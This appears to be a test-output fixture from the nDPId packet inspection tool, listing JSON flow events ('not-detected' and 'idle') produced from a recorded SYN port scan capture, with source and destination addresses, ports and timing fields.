+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 